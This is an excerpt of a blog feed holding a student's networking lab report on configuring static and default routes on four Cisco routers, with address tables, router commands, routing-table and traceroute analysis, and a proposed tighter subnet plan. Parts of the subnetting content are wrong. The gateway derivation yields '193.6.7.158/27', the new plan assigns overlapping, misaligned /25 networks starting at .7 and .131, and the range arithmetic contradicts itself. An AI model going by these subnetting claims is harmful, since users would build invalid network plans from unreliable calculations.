align="center">192.168.1.254/24</td><td align="center">None</td></tr><tr><td align="center">3</td><td align="center">R1 interface F0/1</td><td align="center">192.168.2.253/30</td><td align="center">None</td></tr><tr><td align="center">4</td><td align="center">R2 interface F0/0</td><td align="center">192.168.2.254/30</td><td align="center">None</td></tr><tr><td align="center">5</td><td align="center">R2 interface F0/1</td><td align="center">192.168.3.253/30</td><td align="center">None</td></tr><tr><td align="center">6</td><td align="center">R3 interface F0/0</td><td align="center">192.168.3.254/30</td><td align="center">None</td></tr><tr><td align="center">7</td><td align="center">R3 interface F0/1</td><td align="center">192.168.4.129/25</td><td align="center">None</td></tr><tr><td align="center">8</td><td align="center">PC2</td><td align="center">192.168.4.254/25</td><td align="center">192.168.4.129</td></tr><tr><td align="center">9</td><td align="center">R2 interface F1/0</td><td align="center">192.168.5.253/30</td><td align="center">None</td></tr><tr><td align="center">10</td><td align="center">R4 interface F0/0</td><td align="center">192.168.5.254/30</td><td align="center">None</td></tr><tr><td align="center">11</td><td align="center">R4 interface F0/1</td><td align="center">192.168.6.193/26</td><td align="center">None</td></tr><tr><td align="center">12</td><td align="center">PC3</td><td align="center">192.168.6.254/26</td><td 
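align="center">192.168.6.193</td></tr></tbody></table><p>When assigning IPs and subnet masks to nodes, the IPs given to two nodes in the same segment only need to lie within that segment; their order does not matter as long as they are not equal.</p><p><strong>Choosing the gateway IP</strong></p><p>Before filling in a gateway IP, first establish which segment the gateway sits in. The figure below shows that the nodes (e0) of the three PCs are in the same segments as R1 interface F0/0, R3 interface F0/1 and R4 interface F0/1 respectively. A gateway IP must be chosen from the same segment, so the gateway IPs for PC2 and PC3 are of the form 192.168.4.x and 192.168.6.x; the last octet only has to fall within the segment's range. For example, PC2's range is 192.168.4.<code>129</code>~192.168.4.<code>254</code> and PC3's range is 192.168.6.<code>193</code>~192.168.4.<code>254</code>.</p><p>The default gateway address is obtained by setting all host bits except the last to 1. A network prefix of 24 means the first 24 bits are network bits and the last 8 bits are host bits. For example, for a node whose IP address/subnet mask is 192.168.4.129/25, the default gateway is the IP address 192.168.4.1<strong>1111110</strong> (the bold digits are the host bits), which in decimal is 192.168.4.254/25.</p><blockquote><p>Anything written in IP address format needs a network prefix appended; anything in subnet mask format does not. If the network prefix of 192.168.4.129/25 were 27, there would be 32-27=5 host bits, so the default gateway address would be 192.168.4.100<strong>11110</strong> -> 193.6.7.158/27.</p></blockquote><p><img src="https://img-blog.csdnimg.cn/img_convert/eec80f8496e78767205b63633a4805ef.png#pic_center" alt="例"></p><center> <b> <small> Figure 5.1     Example topology for the lab </small> </b></center><h2 id="网络基本配置"><a href="#网络基本配置" class="headerlink" title="网络基本配置"></a>Basic network configuration</h2><ol><li><p>Before configuring the nodes we can do some basic preparation, such as naming the routers. After initialization in this lab every router is named <code>Router</code> by default, so to make observation and note-taking easier we can name the four routers R1~R4 as follows:</p><p>① Enter privileged mode: <code>enable</code></p><p>② Enter terminal configuration mode: <code>conf t</code></p><p>③ Change the router name: <code>host R1/R2/R3/R4</code></p></li><li><p>Configure node IPs</p><p>First configure the IPs of the three PCs; the command format is <code>ip IP-address/subnet-mask gateway-IP</code></p><p>PC1</p><p><img src="https://gitee.com/wm-mxbg/my-image-hosting-service/raw/master/3-1-1.jpg"></p><center> <b> <small> Figure 6.1     IP configuration of PC1 </small> </b></center><p>PC2</p><p><img src="https://gitee.com/wm-mxbg/my-image-hosting-service/raw/master/3-1-2.jpg"></p> <center> <b> <small> Figure 6.2     IP configuration of PC2 </small> </b> </center><p>PC3</p><p><img src="https://gitee.com/wm-mxbg/my-image-hosting-service/raw/master/3-1-3.jpg"></p> <center> <b> <small> Figure 6.3     IP configuration of PC3 </small> </b> </center><p>Next configure the IPs of routers R1~R4; the command format is <code>IP interface-IP-address interface-subnet-mask</code>. To check that the interface IP configuration is correct, use <code>do show ip int 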
b</code></p><p>I forgot to take screenshots after the first configuration, and the environment was then reset so the chance was lost. The images therefore only show the resulting interface configuration, and the actual interface configuration commands are shown as code.</p><p>First enter terminal configuration mode: <code>conf t</code></p><p><strong>R1</strong></p> <figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">int</span> f0/<span class="number">0</span> <span class="comment">// enter f0/0 interface mode</span></span><br><span class="line">ip add <span class="number">192.168</span><span class="number">.1</span><span class="number">.254</span> <span class="number">255.255</span><span class="number">.255</span><span class="number">.0</span> <span class="comment">// set the IP address and subnet mask</span></span><br><span class="line">no sh <span class="comment">// enable the f0/0 interface</span></span><br><span class="line"><span class="type">int</span> f0/<span class="number">1</span> <span class="comment">// enter f0/1 interface mode</span></span><br><span class="line">ip add <span class="number">192.168</span><span class="number">.2</span><span class="number">.253</span> <span class="number">255.255</span><span class="number">.255</span><span class="number">.252</span> <span class="comment">// set the IP address and subnet mask</span></span><br><span class="line">no sh <span class="comment">// enable the f0/1 interface</span></span><br></pre></td></tr></table></figure><p>For R2~R4 only the ip add commands are shown.</p><p><img src="https://img-blog.csdnimg.cn/img_convert/cdc8ac1e681b42b1a3bee192fc398fe0.png#pic_center" alt="3-1-27"></p><center> <b> <small> Figure 6.4     IP configuration of R1 </small> </b></center><p><strong>R2</strong></p><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">ip add <span class="number">192.168</span><span class="number">.2</span><span class="number">.254</span> <span 
class="number">255.255</span><span class="number">.255</span><span class="number">.252</span></span><br><span class="line">ip add <span class="number">192.168</span><span class="number">.3</span><span class="number">.253</span> <span class="number">255.255</span><span class="number">.255</span><span class="number">.252</span></span><br><span class="line">ip add <span class="number">192.168</span><span class="number">.5</span><span class="number">.253</span> <span class="number">255.255</span><span class="number">.255</span><span class="number">.252</span></span><br></pre></td></tr></table></figure><p><img src="https://img-blog.csdnimg.cn/img_convert/3abf65509469a186d96354bebe800010.png#pic_center" alt="3-1-28"></p><center> <b> <small> Figure 6.5     IP configuration of R2 </small> </b></center><p><strong>R3</strong></p><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">ip add <span class="number">192.168</span><span class="number">.3</span><span class="number">.254</span> <span class="number">255.255</span><span class="number">.255</span><span class="number">.252</span></span><br><span class="line">ip add <span class="number">192.168</span><span class="number">.4</span><span class="number">.129</span> <span class="number">255.255</span><span class="number">.255</span><span class="number">.128</span></span><br></pre></td></tr></table></figure><p><img src="https://img-blog.csdnimg.cn/img_convert/0653e9b73aa78bfe3d82de28c07d7737.png#pic_center" alt="3-1-29"></p><center> <b> <small> Figure 6.6     IP configuration of R3 </small> </b></center><p><strong>R4</strong></p><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">ip add <span class="number">192.168</span><span class="number">.5</span><span class="number">.254</span> <span class="number">255.255</span><span 
class="number">.255</span><span class="number">.252</span></span><br><span class="line">ip add <span class="number">192.168</span><span class="number">.6</span><span class="number">.193</span> <span class="number">255.255</span><span class="number">.255</span><span class="number">.192</span></span><br></pre></td></tr></table></figure><p><img src="https://img-blog.csdnimg.cn/img_convert/6f17ed3ec55531701146e9401637f33b.png#pic_center" alt="3-1-30"></p><center> <b> <small> Figure 6.7     IP configuration of R4 </small> </b></center></li><li><p>Configuration analysis<br>Run <code>show run</code> to view the configuration.</p><p><img src="https://img-blog.csdnimg.cn/img_convert/a36861b46e80c8d6ac959aa1d2dadcbf.png#pic_center" alt="3-1-24"></p><center> <b> <small> Figure 6.8     R3 configuration, part 1 </small> </b></center><p>The configuration output in the figure above does not contain much valuable information; it shows, for example:</p><p>Current configuration size: <code>807Bytes</code></p><p>Version: <code>12.4</code></p><p>Router name: <code>R3</code></p><p>and so on.</p><p><img src="https://img-blog.csdnimg.cn/img_convert/5f8471eed2d357120aaab5e09c0973c2.png#pic_center" alt="3-1-25"></p><center> <b> <small> Figure 6.9     R3 configuration, part 2 </small> </b></center><p>This figure contains more information, but all of one kind: it mainly describes the IP configuration of each R3 interface.</p><p>R3 interface f0/0: <code>IP address/subnet mask: 192.168.3.254/30</code></p><p>R3 interface f0/1: <code>IP address/subnet mask: 192.168.4.129/25</code></p><p>R3 interface f1/0: <code>no IP address assigned</code></p><p>R3 interface f2/0: <code>no IP address assigned</code></p><p>Because this output was captured after I had configured the default route, the figure also shows the route configured on R3:</p><center> <b> <small> Table 7.1     R3 route configuration </small> </b></center><table><thead><tr><th align="center">Destination network</th><th align="center">Destination mask</th><th align="center">Next-hop IP</th></tr></thead><tbody><tr><td align="center"><code>0.0.0.0</code></td><td align="center"><code>0.0.0.0</code></td><td align="center"><code>192.168.3.253</code></td></tr></tbody></table></li></ol><h2 id="静态路由、默认路由配置"><a href="#静态路由、默认路由配置" class="headerlink" title="静态路由、默认路由配置"></a>Static route and default route configuration</h2><ol><li><p><strong>Static routes on every router</strong></p><p>When I first configured static routes, I set up static routes on all routers, rather than static routes only on R2 and default routes on R1, R3 and R4.</p><p>The format for configuring a static route is <code>ip route destination-network destination-mask next-hop-IP</code>. To check that the route configuration is correct, use: <code>do show ip 
route</code></p><p><strong>R1</strong></p><p><img src="https://img-blog.csdnimg.cn/img_convert/80f98b41b7211810cc858561049a5184.png#pic_center" alt="3-1-4"></p><center> <b> <small> Figure 7.1     Static route configuration of R1 </small> </b></center><p><strong>R2</strong></p><p><img src="https://img-blog.csdnimg.cn/img_convert/dc65fe8d8a4bddacc0c2cadde2e36943.png#pic_center" alt="3-1-5"></p><center> <b> <small> Figure 7.2     Static route configuration of R2 </small> </b></center><p><strong>R3</strong></p><p><img src="https://img-blog.csdnimg.cn/img_convert/319e92ef9042a614dbea167957335d87.png#pic_center" alt="3-1-7"></p> <center> <b> <small> Figure 7.3     Static route configuration of R3 </small> </b> </center><p><strong>R4</strong></p><p><img src="https://gitee.com/wm-mxbg/my-image-hosting-service/raw/master/StaticBlog/1744077eb187c0be2dca91942c99083a.png" alt="3-1-8"></p> <center> <b> <small> Figure 7.4     Static route configuration of R4 </small> </b> </center></li><li><p><strong>Static routes plus default routes</strong></p><p>After configuring static routes everywhere, I followed the requirements on edu and configured default routes on the three stub routers R1, R3 and R4, while R2 kept its static routes.</p><p>In this lab the default routes I configured use 0 for both the destination IP and the subnet mask: <code>ip route 0.0.0.0 0.0.0.0 next-hop-IP</code></p><p><strong>R1</strong></p><p><img src="https://img-blog.csdnimg.cn/img_convert/53d17371bce230db442bb958f6090ea4.png#pic_center" alt="3-1-12"></p><center> <b> <small> Figure 7.5     Default route configuration of R1 </small> </b></center><p><strong>R2</strong></p><p><img src="https://img-blog.csdnimg.cn/img_convert/b12818507d55868bd29642b1c23357b3.png#pic_center" alt="3-1-13"></p><center> <b> <small> Figure 7.6     Static route configuration of R2 </small> </b></center><p><strong>R3</strong><img src="https://img-blog.csdnimg.cn/img_convert/c7955ab5bbb58b99d8a520e2f7467815.png#pic_center" alt="3-1-14"></p><center> <b> <small> Figure 7.7     Default route configuration of R3 </small> </b></center><p><strong>R4</strong><img src="https://img-blog.csdnimg.cn/img_convert/0a6fade2d87ef47911f91c27f189ce37.png#pic_center" alt="3-1-15"></p><center> <b> <small> Figure 7.8     Default route configuration of R3 </small> </b></center><p>A close look shows that, except for R2, the route configuration of every router contains many extra non-default route lines. This is because I configured the default routes right after configuring static routes on all routers, leaving redundant entries in the route configuration of the three stub routers R1, R2 and R3. So I used <code>no ip route destination-network destination-mask next-hop-IP 
</code> to remove the static routes previously configured on routers R1, R2 and R3.</p><p><strong>R1</strong><img src="https://img-blog.csdnimg.cn/img_convert/388e7cbb318ce1c0845f9b0b014a9c22.png#pic_center" alt="3-1-16"></p><center> <b> <small> Figure 7.9     Correct default route configuration of R1 </small> </b></center><p><strong>R3</strong></p><p><img src="https://img-blog.csdnimg.cn/img_convert/5f75d0d814d06962989135d087ad36bd.png#pic_center" alt="3-1-18"></p><center> <b> <small> Figure 7.10     Correct default route configuration of R3 </small> </b></center><p><strong>R4</strong></p><p><img src="https://img-blog.csdnimg.cn/img_convert/9de1c1abd60edd379bf3b99216803d46.png#pic_center" alt="3-1-19"></p><center> <b> <small> Figure 7.11     Correct default route configuration of R4 </small> </b></center><p>Here I noticed that after no ip add, the subnet masks shown in the route output were all 24, which did not match the masks I had originally set. After the environment was reset and I configured everything a second time, I queried the routes again and the subnet masks shown were back to normal, matching what I had set.</p><p>I suspect the no ip add command caused an initialization problem. (Possibly.)</p></li><li><p><strong>R3 routing table and analysis</strong></p><p>Viewing R3's routes gives:</p><p><img src="https://img-blog.csdnimg.cn/img_convert/cb0fd8eb9956a97552e2d3d72638a9f4.png#pic_center" alt="3-1-31"></p><center> <b> <small> Figure 7.12     R3 routes </small> </b></center><p>Compiled into a table:</p> <center> <b> <small> Table 7.1     R3 routing table </small> </b> 
</center><table><thead><tr><th>Destination IP/mask</th><th>Protocol</th><th>Priority</th><th>Cost</th><th>Next hop</th><th>Local exit interface</th></tr></thead><tbody><tr><td>192.168.4.0/25</td><td>Direct</td><td>0</td><td>0</td><td>/</td><td>FastEthernet0/0</td></tr><tr><td>192.168.3.0/30</td><td>Direct</td><td>0</td><td>0</td><td>/</td><td>FastEthernet0/1</td></tr><tr><td>0.0.0.0/0</td><td>Static</td><td>1</td><td>0</td><td>192.168.3.253</td><td>GigabitEthernet0</td></tr></tbody></table><p>First look at <code>Protocol</code>:</p><p>The protocol of the first two rows is Direct, meaning the segment is directly connected to a local interface. Once an IP address is set on the interface the route entry is created automatically, and when the IP address is removed from the interface the entry disappears automatically.</p><p>The protocol of the third row is Static, meaning the route entry was added by a command and can be removed by a command.</p><p>Next, <code>Destination IP/mask</code> and <code>Local exit interface</code>:</p><p>Destination IP/mask for R3's f0/0 interface: 192.168.4.0/25</p><p>Destination IP/mask for R3's f0/1 interface: 192.168.3.0/30</p><p>Destination IP/mask of R3's static route: 0.0.0.0/0; static next-hop IP: 192.168.3.253</p><p>Finally, <code>Priority</code> and <code>Cost</code>:</p><p>The priority and cost of R3's f0/0 and f0/1 interfaces are both 0, so they are strongly preferred when matching.</p><p>The configured route entry on R3 has priority 1 and cost 0, so by priority it is less preferred than R3's own interfaces.</p></li><li><p><strong>R4 routing table and analysis</strong></p><p>Viewing R3's routes gives:</p><p><img src="https://img-blog.csdnimg.cn/img_convert/a1143479bb130a21e2b95ce6d3037b39.png#pic_center" alt="3-1-32"></p><center> <b> <small> Figure 7.13     R4 routes </small> </b></center><p>Compiled into a table:</p> <center> <b> <small> Table 7.2     R4 routing table </small> </b> </center><table><thead><tr><th align="center">Destination IP/mask</th><th align="center">Protocol</th><th align="center">Priority</th><th align="center">Cost</th><th align="center">Next hop</th><th align="center">Local exit interface</th></tr></thead><tbody><tr><td align="center">192.168.5.0/30</td><td align="center">Direct</td><td align="center">0</td><td align="center">0</td><td align="center">/</td><td align="center">FastEthernet0/0</td></tr><tr><td align="center">192.168.6.0/26</td><td align="center">Direct</td><td align="center">0</td><td align="center">0</td><td align="center">/</td><td align="center">FastEthernet0/1</td></tr><tr><td align="center">0.0.0.0/0</td><td align="center">Static</td><td align="center">1</td><td align="center">0</td><td align="center">192.168.5.253</td><td 
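align="center">GigabitEthernet0</td></tr></tbody></table><p>First look at <code>Protocol</code>:</p><p>The protocol of the first two rows is Direct, meaning the segment is directly connected to a local interface. Once an IP address is set on the interface the route entry is created automatically, and when the IP address is removed from the interface the entry disappears automatically.</p><p>The protocol of the third row is Static, meaning the route entry was added by a command and can be removed by a command.</p><p>Next, <code>Destination IP/mask</code> and <code>Local exit interface</code>:</p><p>Destination IP/mask for R4's f0/0 interface: 192.168.5.0/30</p><p>Destination IP/mask for R4's f0/1 interface: 192.168.6.0/26</p><p>Destination IP/mask of R4's static route: 0.0.0.0/0; static next-hop IP: 192.168.5.253</p><p>Finally, <code>Priority</code> and <code>Cost</code>:</p><p>The priority and cost of R4's f0/0 and f0/1 interfaces are both 0, so they are strongly preferred when matching.</p><p>The configured route entry on R4 has priority 1 and cost 0, so by priority it is less preferred than R3's own interfaces.</p></li><li><p><strong>Network connectivity test</strong></p><p>In <strong><code>1. Static routes on every router</code></strong> I configured static routes on every router; the connectivity test results are as follows:</p><p><img src="https://img-blog.csdnimg.cn/img_convert/9949ca06781ecde67899cfc8d75a5e00.png#pic_center" alt="3-1-9"></p><center> <b> <small> Figure 7.14     Connectivity test results for P1 to P3 and P1 to P2 </small> </b></center><p>Nothing unusual.</p><p>In <strong><code>2. Static routes plus default routes</code></strong> I configured static routes on R2 and default routes on the three routers R1, R3 and R4; the connectivity test results are as follows:</p><p><img src="https://img-blog.csdnimg.cn/img_convert/109e7a635ee7fcbeab040c846a03880c.png#pic_center" alt="3-1-33"></p> <center> <b> <small> Figure 7.15     Connectivity test results for P1 to P2 and P1 to P3 </small> </b> </center><p>Timeouts were fairly severe when testing connectivity to P2.</p></li><li><p><strong>Route tracing test</strong></p><p>In <strong><code>1. Static routes on every router</code></strong> I configured static routes on every router; the route tracing results are as follows:</p><p><img src="https://img-blog.csdnimg.cn/img_convert/646c95d75da695f3c8e44e05226d75d4.png#pic_center" alt="3-1-11"></p><center> <b> <small> Figure 7.16     Trace result from P1 to P3 </small> </b></center><p>Tracing from P1 to P3, the IPs are traversed in the order <code>PC1——R1(f0/0)——R2(f0/0)——R4(f0/0)——PC3</code>; the IP addresses in the four rows of the figure are the node IPs in the same order.</p><p>For the three IPs at the same hop spacing (192.168.1.254, 192.168.2.254, 192.168.5.254), the gateway address shows one probe timing out; for the IP one level further away (192.168.6.254), the gateway address shows two probes timing out.</p><blockquote><p><code>* </code> means the port is unreachable or the maximum has been reached (30 hops by default, changeable with the -m flag). Three probes are sent at each TTL setting and one line is printed showing the TTL, the gateway address and the round-trip time of each probe (hence three *). If there is no response within the 5-second timeout interval, a "*" is printed for that probe.</p></blockquote><p>In **<code>2. 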
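Static routes plus default routes</code>** I configured static routes on R2 and default routes on the three routers R1, R3 and R4; the connectivity test results are as follows:</p><p><img src="https://img-blog.csdnimg.cn/img_convert/78e2aa7924fb58ab7e4cf73b61a9ccf2.png#pic_center" alt="3-1-20"></p> <center> <b> <small> Figure 7.17     P1 to P3 trace, test result_1 </small> </b> </center><p><img src="https://img-blog.csdnimg.cn/img_convert/ed7f678c0f8e25d6af0446917f19229f.png#pic_center" alt="3-1-21"></p> <center> <b> <small> Figure 7.18     P1 to P3 trace, test result_2 </small> </b> </center><p><img src="https://img-blog.csdnimg.cn/img_convert/1fd29e1b750861473e5a5cd9f2825b8c.png#pic_center" alt="3-1-22"></p> <center> <b> <small> Figure 7.19     P1 to P3 trace, test result_3 </small> </b> </center><p><code>test result_1</code> is what I got from the first trace after the first configuration. I traced once and did not try again, and the next day the environment was forcibly reset; after the second configuration, no matter how many times I traced, I could never reproduce <code>test result_1</code>.</p><p>It may be a network issue, with the probes to the gateway timing out every time;</p><p>the total number of nodes on the path is less than 30, so reaching the maximum hop count is ruled out;</p><p>it may also be that some unidentified routing misconfiguration made the port unreachable.</p><blockquote><p><code>* * *</code> means the router at that hop does not respond to the packet type used for tracing (by default UDP on Unix-like systems and ICMP on Windows), so the tracer learns nothing about that hop.</p></blockquote><p><code>test result_2</code> is a result I got only after at least ten-odd traces following the second configuration. <code>test result_3</code> is the most common trace result. Compared with the trace under <code>Static routes on every router</code>, because the default goes directly to <code>0.0.0.0</code>, there is one fewer probe timeout at the gateway, or put differently, one more probe answered by the gateway.</p></li></ol><h2 id="实验总结"><a href="#实验总结" class="headerlink" title="实验总结"></a>Lab summary</h2><ol><li><p><strong>Subnet planning</strong></p><p>I have more thoughts on IP address planning that did not fit well in the body of the report, so I continue here in the summary.</p><p>In my original plan the third octet increments from 1 to 6. The convenience is that the segments are already distinguished before reaching the fourth octet, where the host bits are. This approach does waste some host bits.</p><p>Although the fourth octet of each segment IP was deliberately given a starting value to match the required number of IPs, this is no improvement over starting every segment at 0: in essence the same number of bits is occupied, because distinguishing segments at the third octet implicitly takes up all 254 allocatable IPs behind it, even if fewer than 254 are actually used.</p><p>So after the lab I studied the problem carefully and worked out an <code>IP subnet address plan</code> that makes fuller use of the address space.</p><center> <b> <small> Table 8.1     New IP subnet address plan </small> </b></center><table><thead><tr><th align="center">Segment No.</th><th align="center">IP address</th><th align="center">Subnet mask</th><th align="center">IPs required</th><th align="center">Segment type</th><th align="center">Gateway IP</th><th>Member nodes in the figure</th></tr></thead><tbody><tr><td align="center">1</td><td align="center">192.168.1.0</td><td align="center">24</td><td align="center">230</td><td 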
align="center">User</td><td align="center">192.168.1.254</td><td>PC1, R1 interface F0/0</td></tr><tr><td align="center">2</td><td align="center">192.168.2.0</td><td align="center">30</td><td align="center">2</td><td align="center">Interconnect</td><td align="center">None</td><td>R1 interface F0/1, R2 interface F0/0</td></tr><tr><td align="center">3</td><td align="center">192.168.2.4</td><td align="center">30</td><td align="center">2</td><td align="center">Interconnect</td><td align="center">None</td><td>R2 interface F0/1, R3 interface F0/0</td></tr><tr><td align="center">4</td><td align="center">192.168.2.7</td><td align="center">25</td><td align="center">100</td><td align="center">User</td><td align="center">192.168.2.9</td><td>R3 interface F0/1, PC2</td></tr><tr><td align="center">5</td><td align="center">192.168.2.128</td><td align="center">30</td><td align="center">2</td><td align="center">Interconnect</td><td align="center">None</td><td>R2 interface F1/0, R4 interface F0/0</td></tr><tr><td align="center">6</td><td align="center">192.168.2.131</td><td align="center">25</td><td align="center">60</td><td align="center">User</td><td align="center">192.168.2.133</td><td>R4 interface F0/1, PC3</td></tr></tbody></table> <center> <b> <small> Table 8.2     New IP address allocation table </small> </b> </center><table><thead><tr><th align="center">No.</th><th align="center">Node name</th><th align="center">IP address/subnet mask</th><th align="center">Gateway IP</th></tr></thead><tbody><tr><td align="center">1</td><td align="center">PC1</td><td align="center">192.168.1.1/24</td><td align="center">192.168.1.254</td></tr><tr><td align="center">2</td><td align="center">R1 interface F0/0</td><td align="center">192.168.1.254/24</td><td align="center">None</td></tr><tr><td align="center">3</td><td align="center">R1 interface F0/1</td><td align="center">192.168.2.1/30</td><td align="center">None</td></tr><tr><td align="center">4</td><td align="center">R2 interface F0/0</td><td align="center">192.168.2.2/30</td><td align="center">None</td></tr><tr><td align="center">5</td><td align="center">R2 interface F0/1</td><td align="center">192.168.2.5/30</td><td align="center">None</td></tr><tr><td 
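align="center">6</td><td align="center">R3 interface F0/0</td><td align="center">192.168.2.6/30</td><td align="center">None</td></tr><tr><td align="center">7</td><td align="center">R3 interface F0/1</td><td align="center">192.168.2.8/25</td><td align="center">None</td></tr><tr><td align="center">8</td><td align="center">PC2</td><td align="center">192.168.2.126/25</td><td align="center">192.168.2.8</td></tr><tr><td align="center">9</td><td align="center">R2 interface F1/0</td><td align="center">192.168.2.129/30</td><td align="center">None</td></tr><tr><td align="center">10</td><td align="center">R4 interface F0/0</td><td align="center">192.168.2.130/30</td><td align="center">None</td></tr><tr><td align="center">11</td><td align="center">R4 interface F0/1</td><td align="center">192.168.2.132/25</td><td align="center">None</td></tr><tr><td align="center">12</td><td align="center">PC3</td><td align="center">192.168.2.254/25</td><td align="center">192.168.2.132</td></tr></tbody></table><p>Compared with the subnet plan used in the lab, I set the third octet of segments two through six to <code>2</code> and the subnet mask of the sixth segment to <code>25</code>, making full use of the address space.</p><p>The address space utilization of the old plan is <code>25.984%</code></p><p>(IPs actually allocated (excluding host bits all 0 and all 1) / IPs set aside by the plan: <code>(230+100+60+3*2)/(254*6)</code>)</p><p>while the address space utilization of the new plan is <code>78.884%</code></p><p>(IPs actually allocated (excluding host bits all 0 and all 1) / IPs set aside by the plan: <code>(230+100+60+3*2)/(254+119+123+3*2)</code>)</p><p>The new plan saves <code>67.060%</code> of the space compared with the old plan</p><p>((IPs set aside by the old plan - IPs set aside by the new plan) / IPs set aside by the old plan)</p><p>Below I explain the plan in detail:</p><p>After finishing the lab I thought: the IPs required by segments two through six add up to fewer than 254, so what if the third octet of all five segment IPs were set to 2, i.e. <code>192.168.2.x</code>? After lengthy analysis I concluded this approach is feasible.</p><p>First, to be clear, addresses with host bits all 0 or all 1 are not assigned to hosts. So for the second segment, whose IP is <code>192.168.2.0</code>, the only IPs allocated within it are <code>192.168.2.1</code> and <code>192.168.2.2</code>; the <code>2 host bits</code> of <code>192.168.2.0</code> and <code>192.168.2.3</code> are all 0 and all 1 respectively, so they cannot be used. The same holds for every segment. The range each segment expresses is therefore as follows (<code>both endpoint IPs are inside the allocatable range</code>):</p> <center> <b> <small> Table 8.3     Allocatable IP range per segment </small> </b> </center><table><thead><tr><th align="center">No.</th><th align="center">Segment IP address</th><th align="center">Subnet mask</th><th align="center">IPs required</th><th 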
align="center">Allocatable IP range</th></tr></thead><tbody><tr><td align="center">1</td><td align="center">192.168.1.0</td><td align="center">24</td><td align="center">230</td><td align="center">192.168.1.1~192.168.1.254</td></tr><tr><td align="center">2</td><td align="center">192.168.2.0</td><td align="center">30</td><td align="center">2</td><td align="center">192.168.2.1~192.168.2.2</td></tr><tr><td align="center">3</td><td align="center">192.168.2.4</td><td align="center">30</td><td align="center">2</td><td align="center">192.168.2.5~192.168.2.6</td></tr><tr><td align="center">4</td><td align="center">192.168.2.7</td><td align="center">25</td><td align="center">100</td><td align="center">192.168.2.8~192.168.2.126</td></tr><tr><td align="center">5</td><td align="center">192.168.2.128</td><td align="center">30</td><td align="center">2</td><td align="center">192.168.2.129~192.168.2.130</td></tr><tr><td align="center">6</td><td align="center">192.168.2.131</td><td align="center">25</td><td align="center">60</td><td align="center">192.168.2.132~192.168.2.254</td></tr></tbody></table><p>You may have noticed that the segments with subnet mask 30, which only need 2 IPs, have a range of just <code>2</code> addresses. So <font color='red'>why do the fourth and sixth segments, with subnet mask 25 and needing 100 and 60 IPs respectively, have ranges of <code>119</code> and <code>123</code> addresses?</font></p><p>This is the easiest place to go wrong when packing IPs tightly into the <code>192.168.2.x</code> segment.</p><p>When allocating, it is tempting to think the range only needs to be as large as the number of IPs required, as with the segments whose subnet mask is <code>30</code>, but that is not the logic behind these ranges.</p><p>I will use a diagram to explain how the range values are derived. <img src="https://img-blog.csdnimg.cn/img_convert/3cf6d3e7610ac7e6ac544a904c18b5a0.png#pic_center" alt="3-1-34"></p> <center> <b> <small> Figure 8.1     Representation of the allocatable IP ranges </small> </b> 
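</center><p>The starting address is 192.168.2.<code>8</code>. Relative to subnet mask <code>30</code>, 192.168.2.<code>7</code> is equivalent to <code>host bits all 1</code>, whereas relative to subnet mask <code>25</code> it is just one IP within the allocatable range (if the lowest allocatable IP is 192.168.2.0). So 192.168.2.<code>7</code> can serve as the segment IP of the fourth segment, with 192.168.2.<code>8</code> as its starting address.</p><p>Following habit, one would take 192.168.2.<code>107</code> as the highest allocatable IP (107-8+1=100). That expresses the requirement fine, but note that with subnet mask <code>25</code> the highest allocatable host IP is 192.168.2.<code>126</code> (127 is host bits all 1, and 128 enters the next segment). This means that even if we arbitrarily set the highest allocatable IP to 192.168.2.<code>107</code>, 192.168.2.<code>108</code>~192.168.2.<code>126</code> are still unallocated IPs inside this segment. So the number of IPs set aside for the fourth segment is 126-8+1=<code>129</code>, not 100 just because 100 are needed; that is where the space utilization (100/129) comes from.</p><p>That leaves only the sixth segment. Its starting IP is 192.168.2.<code>132</code>. If the subnet mask were left at <code>26</code>, the highest allocatable IP would be 192.168.2.<code>190</code>, and <code>190-132+1=59<60</code>, one short of the required number, so the segment could not meet the requirement. Changing the subnet mask to <code>25</code> raises the highest allocatable IP to 192.168.2.<code>254</code>, and the range then satisfies the required number of IPs (254-132+1=123).</p><p>That concludes my further thinking and exploration on subnetting; if there are errors, I hope readers will correct them.</p></li><li><p><strong>Default route</strong></p><p>The default route example given in the knowledge guide on edu is ip route <code>0 0 </code>10.10.10.10, but entering it that way produces an error; the correct command format is ip route <code>0.0.0.0 0.0.0.0</code> 10.10.10.10.</p></li></ol><p>That is my summary of this lab. Much of the analysis that belongs in a summary was already written in the body of the report, which makes the body less formal in wording and leaves the summary covering few aspects; if there are errors, please correct me.</p>]]></content>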
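<summary type="html"><p>(This is a computer networking lab on the 头歌 (EduCoder) platform. I couldn't be bothered to edit the content, so I uploaded the lab report as is. Feel free to jump to whichever part of the article you want to read.)</p>
<h2 id="实验目的"><a href="#实验目的" class="headerlink" title="实验目的"></a>Lab objectives</h2></summary>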
<category term="Computer Network" scheme="http://example.com/categories/Computer-Network/"/>
<category term="experiment" scheme="http://example.com/tags/experiment/"/>
<category term="note" scheme="http://example.com/tags/note/"/>
</entry>
<entry>
<title>XSS & SQL injection</title>
<link href="http://example.com/2020/12/16/XSS%20&%20SQL%20injection/"/>
<id>http://example.com/2020/12/16/XSS%20&%20SQL%20injection/</id>
<published>2020-12-15T20:11:50.000Z</published>
<updated>2022-03-18T06:03:46.017Z</updated>
